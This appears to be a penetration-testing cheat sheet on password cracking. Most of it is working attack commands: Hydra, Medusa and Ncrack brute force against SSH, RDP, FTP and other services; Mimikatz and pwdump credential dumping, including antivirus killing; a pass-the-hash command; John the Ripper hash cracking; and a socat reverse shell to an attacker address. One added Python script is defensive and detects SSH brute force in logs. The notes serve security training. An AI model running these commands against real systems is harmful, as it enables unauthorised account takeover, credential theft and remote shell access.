11 - Cracking
Medusa
medusa -h 10.11.1.227 -U lab-users.txt -P lab-passwords.txt -M ftp | grep "ACCOUNT FOUND"
Ncrack (FTP, SSH, TELNET, HTTP(S), POP3(S), SMB, RDP, VNC)
ncrack -U <[USERS_LIST]> -P <[PASSWORDS_LIST]> ftp://<[IP]>
AES Decryption
http://aesencryption.net/
Convert multiple webpages into a word list
for x in 'index' 'about' 'post' 'contact' ; do curl http://$ip/$x.html | html2markdown | tr -s ' ' '\n' >> webapp.txt ; done
Or convert html to word list dict
html2dic index.html.out | sort -u > index-html.dict
--------------- Default Usernames and Passwords ---------------
CIRT
http://www.cirt.net/passwords
Government Security - Default Logins and Passwords for Networked Devices
http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php
Virus.org
http://www.virus.org/default-password/
Default Password
http://www.defaultpassword.com/
--------------- Brute Force ---------------
Nmap Brute forcing Scripts
https://nmap.org/nsedoc/categories/brute.html
Nmap Generic auto detect brute force attack
nmap --script brute -Pn <target.com or ip> <enter>
MySQL nmap brute force attack
nmap --script=mysql-brute $ip
--------------- Dictionary Files ---------------
Word lists on Kali
cd /usr/share/wordlists
Key-space Brute Force
crunch 6 6 0123456789ABCDEF -o crunch1.txt
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
crunch 8 8 -t ,@@^^%%%
Pwdump and Fgdump - Security Accounts Manager (SAM)
pwdump.exe - attempts to extract password hashes
fgdump.exe - attempts to kill local antiviruses before attempting to dump the password hashes and cached credentials.
Windows Credential Editor (WCE)
allows one to perform several attacks to obtain clear text passwords and hashes
wce -w
Mimikatz
extracts plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets
https://github.com/gentilkiwi/mimikatz
From metasploit meterpreter (must have System level access):
meterpreter> load mimikatz
meterpreter> help mimikatz
meterpreter> msv
meterpreter> kerberos
meterpreter> mimikatz_command -f samdump::hashes
meterpreter> mimikatz_command -f sekurlsa::searchPasswords
--------------- Password Profiling ---------------
cewl can generate a password list from a web page
# cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt
Password Mutating
John the ripper can mutate password lists
nano /etc/john/john.conf
john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt
Medusa
Medusa, initiated against an htaccess protected web directory
medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10
Ncrack
ncrack (from the makers of nmap) can brute force RDP
ncrack -vv --user offsec -P password-file.txt rdp://$ip
Hydra
Hydra brute force against SNMP
# hydra -P password-file.txt -v $ip snmp
Hydra FTP known user and password list
# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV $ip ftp
Hydra SSH using list of users and passwords
hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh
Hydra SSH using a known password and a username list
hydra -v -V -u -L users.txt -p "<known password>" -t 1 -u $ip ssh
Hydra SSH Against Known username on port 22
hydra $ip -s 22 ssh -l <user> -P big_wordlist.txt
Hydra POP3 Brute Force
hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f $ip pop3 -V
Hydra SMTP Brute Force
hydra -P /usr/share/wordlists/nmap.lst $ip smtp -V
Hydra attack http get 401 login with a dictionary
hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin
Hydra attack Windows Remote Desktop with rockyou
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
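Added example (not part of the original notes): a defender-side check for the two Hydra SSH patterns above, one username with a password list versus a username list with one known password, run over sshd auth-log lines. The function name analyze, the thresholds and the sample log lines are assumptions constructed for illustration. Because the commands above use -t 1 (one task at a time), it counts totals per source address instead of looking for connection bursts.

```python
import re
from collections import defaultdict

def _ev(outcome, user, ip):
    """Build one constructed sshd auth-log line (sample data, not a real capture)."""
    return f"Jan 10 10:00:00 host sshd[4242]: {outcome} password for {user} from {ip} port 50022 ssh2"

# Constructed sample: a dictionary run that ends in a login, a username sweep,
# and a legitimate user who mistyped a password once.
SAMPLE_LOG = "\n".join(
    [_ev("Failed", "admin", "192.0.2.10")] * 6
    + [_ev("Accepted", "admin", "192.0.2.10")]
    + [_ev("Failed", u, "192.0.2.20") for u in ("alice", "bob")]
    + [_ev("Failed", f"invalid user {u}", "192.0.2.20") for u in ("carol", "dave")]
    + [_ev("Failed", "erin", "198.51.100.5"), _ev("Accepted", "erin", "198.51.100.5")]
)

LINE_RE = re.compile(
    r"sshd\[\d+\]: (Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+"
)

def analyze(log_text, min_failures=5, min_users=4):
    """Return {source_ip: finding} for sources whose failures look like guessing."""
    failed = defaultdict(list)        # ip -> usernames that failed, in log order
    success_after = defaultdict(set)  # ip -> users accepted after earlier failures
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        outcome, user, ip = m.groups()
        if outcome == "Failed":
            failed[ip].append(user)
        elif failed[ip]:
            success_after[ip].add(user)
    findings = {}
    for ip, users in failed.items():
        distinct = set(users)
        if len(distinct) >= min_users:
            kind = "spray"        # many usernames tried (username list, -L)
        elif len(users) >= min_failures:
            kind = "dictionary"   # few usernames, many passwords (-l with -P)
        else:
            continue              # below both thresholds: likely a typo
        findings[ip] = {"kind": kind, "failures": len(users), "users": sorted(distinct),
                        "accepted_after": sorted(success_after[ip])}
    return findings

if __name__ == "__main__":
    for ip, finding in analyze(SAMPLE_LOG).items():
        print(ip, finding)
```

A non-empty accepted_after list is the finding to act on first: that source guessed a working password and the account should be treated as compromised.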
--------------- Password Hash Attacks ---------------
Online Password Cracking
https://crackstation.net/
Hashcat running on
Sample Hashes
http://openwall.info/wiki/john/sample-hashes
Identify Hashes
hash-identifier
To crack Linux hashes you must first unshadow them:
unshadow passwd-file.txt shadow-file.txt
unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
John the Ripper - Password Hash Cracking
john $ip.pwdump
john --wordlist=/usr/share/wordlists/rockyou.txt hashes
john --rules --wordlist=/usr/share/wordlists/rockyou.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
JTR forced descrypt cracking with wordlist
john --format=descrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
JTR forced descrypt brute force cracking
john --format=descrypt hash --show
Passing the Hash in Windows
Use Metasploit to exploit one of the SMB servers in the labs. Dump the password hashes and attempt a pass-the-hash attack against another system:
export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896
# pth-winexe -U administrator //$ip cmd
Cracking zip file password
# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u <filename>.zip
# fcrackzip -D -v -u -p /usr/share/wordlists/rockyou.txt <file>
Cracking 7zip
# ./7x2john.pl file.7z > 7zhash
# john 7zhash --wordlist:/usr/share/wordlists/rockyou.txt
Cracking rsa hash
# python ssh2john.py id_rsa > id_rsa.hash
# john id_rsa.hash --wordlist:/usr/share/wordlists/rockyou.txt
su crack
https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP ADDRESS>:<PORT>
https://labs.portcullis.co.uk/tools/sucrack/
From local machine
# tar -xvf sucrack-1.2.3.tar.gz
# cd sucrack-1.2.3
# ./configure
# make
# tar -cvf sucrack.tar sucrack-1.2.3/
From remote machine
# wget http://<local ip>/sucrack.tar
# tar xvf sucrack.tar
./sucrack -u root -w 10 /<dict file>